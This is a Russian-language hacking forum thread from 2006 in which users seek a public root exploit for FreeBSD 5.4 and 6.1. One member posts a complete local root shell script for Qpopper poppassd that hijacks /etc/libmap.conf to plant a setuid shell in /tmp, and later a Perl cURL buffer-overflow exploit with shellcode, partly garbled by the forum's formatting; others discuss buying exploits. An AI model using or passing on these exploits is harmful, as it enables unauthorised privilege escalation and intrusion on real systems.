У кого есть рут сплойт под фряху?

Discussion in 'Безопасность и Анонимность' started by SanyaX, 31 Aug 2006.

Thread Status:
Not open for further replies.
  1. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Вот собственно под эту версию FreeBSD 5.4-RELEASE сплойт нужен. В инете обыскал не где не нашёл. У кого есть поделитесь :).
     
    2 people like this.
  2. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    вот тебе хорошый сплойт для FreeBSD 5.4-RELEASE

    PHP:
    #!/bin/sh
    ###########################################################################
    # FreeBSD Qpopper poppassd latest version local r00t exploit by kcope   ###
    # tested on FreeBSD 5.4-RELEASE                                         ###
    ###########################################################################

    POPPASSD_PATH=/usr/local/bin/poppassd
    HOOKLIB
    =libutil.so.4

    echo ""
    echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"
    echo ""
    sleep 2
    umask 0000
    if [ -/etc/libmap.conf ]; then
    echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
    exit
    fi
    cat 
    program.<< _EOF
    #include <unistd.h>
    #include <stdio.h>
    #include <sys/types.h>
    #include <stdlib.h>

    void _init()
    {
     if (!
    geteuid()) {
     
    remove("/etc/libmap.conf");
     
    execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
     }
    }

    _EOF
    gcc 
    -o program.-c program.-fPIC
    gcc 
    -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.-nostartfiles
    cp libno_ex
    .so.1.0 /tmp/libno_ex.so.1.0
    echo "--- Now type ENTER ---"
    echo ""
    $POPPASSD_PATH -/etc/libmap.conf
    echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf
    su
    if [ -/tmp/xxxx ]; then
    echo "IT'S A ROOTSHELL!!!"
    /tmp/xxxx
    else
    echo 
    "Sorry, exploit failed."
    fi
     
    #2 Dracula4ever, 31 Aug 2006
    Last edited: 31 Aug 2006
    1 person likes this.
  3. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Не не подходит ошибки выдаёт :(.
    /usr/local/bin/poppassd: not found
    cannot create /etc/libmap.conf: Permission denied
     
    #3 SanyaX, 31 Aug 2006
    Last edited: 31 Aug 2006
  4. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    SanyaX вот посмотри http://www.milw0rm.com/exploits/1230
     
    1 person likes this.
  5. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    ну эт только если Qpopper установлен...
     
    _________________________
  6. [loy]

    [loy] Elder - Старейшина

    Joined:
    24 Mar 2006
    Messages:
    126
    Likes Received:
    23
    Reputations:
    16
    А вот мне нужен Сплоед под FreeBSD 6.1
     
  7. [hidden]

    [hidden] Elder - Старейшина

    Joined:
    5 Nov 2005
    Messages:
    70
    Likes Received:
    19
    Reputations:
    7
    Под шестую ветку есть только парочка DoS-эксплойтов, которые уже не работают
     
  8. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    PHP:
    #!/usr/bin/perl
    #
    # Remote FreeBSD cURL exploit for versions 6.1 - 7.4
    #
    # Written by zillion (at http://www.safemode.org && http://www.xsnosoft.com)
    #
    # This exploit may only be used for testing purposes. More information 
    # about the used vulnerability can be found on securityfocus:
    #
    # http://online.securityfocus.com/bid/1804
    #
    # The shellcode will write "Ha! Owned by a cURL!" to stdout on the system
    # running cURL. The extra nops are needed because the buffer, which causes
    # the overflow, is altered.
    #
    # $ ./curl -s ftp://xxx.xxx.xxx.xxx:21/
    # Ha! Owned by a cURL! 

    use IO::Socket;
    use 
    Net::hostent;

    ########################################################################

    $shellcode 
    "xebx14x5ex31xc0x6ax14x56x40x40x50xb0x04x50xcd".
    "x80x31xc0x40x50xcdx80xe8xe7xffxffxffx48x61x21".
    "x20x4fx77x6ex65x64x20x62x79x20x61x20x63x55x52".
    "x4cx21x23".

    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90";

    while(
    $_ $ARGV[0], /^-/) {
    shift
    last if /^--$/;
    /^-
    p/ && do { $port shift; };
    /^-
    l/ && do { $list 1; };
    /^-
    o/ && do { $offset shift; };
    }


    $id = `id -u`; chop($id);
    $size 225;
    $esp 0xbfbffbd4;
    $offset = -140 unless $offset;
    $port 21 unless $port;

    if(!
    $list || $port 1024 && $id != 0) {

    print 
    Option: $-

    Note
    low ports require root privileges

    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+

    TWENTE
    exit;

    }

    for (
    $i 0$i $port,
    Proto => 'tcp',
    Listen => 1,
    Reuse => 1,
    );
    die 
    "Could not create socket: $!n" unless $sock;

    while(
    $cl $sock->accept()) {

    $hostinfo gethostbyaddr($cl->peeraddr);
    printf "[Received connect from %s]n"$cl->peerhost;
    print 
    $cl "220 Safemode.org FTP server (Version 666) ready.n";
    print 
    $cl "230 Okn";
    print 
    $cl "227 $buffern";
    sleep 2;

    }
     
  9. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    dracula4ever читай описание сплоита в шапке.. вроде инглиш же знаешь
     
  10. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Смешно этот сплойт воще не под рут идёт. Имхо я заметил под фряху воще в паблике сплойтов нету.
     
  11. [hidden]

    [hidden] Elder - Старейшина

    Joined:
    5 Nov 2005
    Messages:
    70
    Likes Received:
    19
    Reputations:
    7
    Ну, по сути можно разгрести шеллкод и переделать=) Мдя..
     
  12. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    так и не нашел.. в паблике точно нет
     
    #12 darky, 19 Sep 2006
    Last edited: 18 Oct 2006
    1 person likes this.
  13. Odissei

    Odissei New Member

    Joined:
    2 Jan 2006
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
    SanyaX а ты нашел спойт под эту версию? если нашел поделись плиз...а то весь гугль обыскал ничего не нашел...или в правду под фряху нефига нету сплоитов (в паблике)?....
     
  14. naqnaq

    naqnaq Elder - Старейшина

    Joined:
    21 Oct 2006
    Messages:
    33
    Likes Received:
    7
    Reputations:
    0
    Все правильно! == в паблике нет local root kernel эксплойтов для FreeBsd => 5.4. Последний master.passwd disclosure exploit (dump in kmem)
     
  15. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    А я бы купил
     
  16. fucker"ok

    fucker"ok Elder - Старейшина

    Joined:
    21 Nov 2004
    Messages:
    580
    Likes Received:
    279
    Reputations:
    91
    >А я бы купил
    за сто рублей ?
     
  17. T0p

    T0p Elder - Старейшина

    Joined:
    28 Dec 2006
    Messages:
    75
    Likes Received:
    16
    Reputations:
    6
    Сплоитов под саму фряху и так не много... уточнять надо локальный удаленый..
    нужно под демоны разве что смотреть..
     
  18. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    При чем здесь ДДОС? С ДДОСА ты не поднимешь рута!
     
    #18 KPOT_f!nd, 30 Dec 2006
    Last edited: 30 Dec 2006
  19. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    DoS и DDos вроде как разные вещи...
     
  20. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    DDoS - Distributed Denial of Service = распределенная атака отказа в обслуживании. Это еще более разрушительная атака чем просто DoS.
     
Thread Status:
Not open for further replies.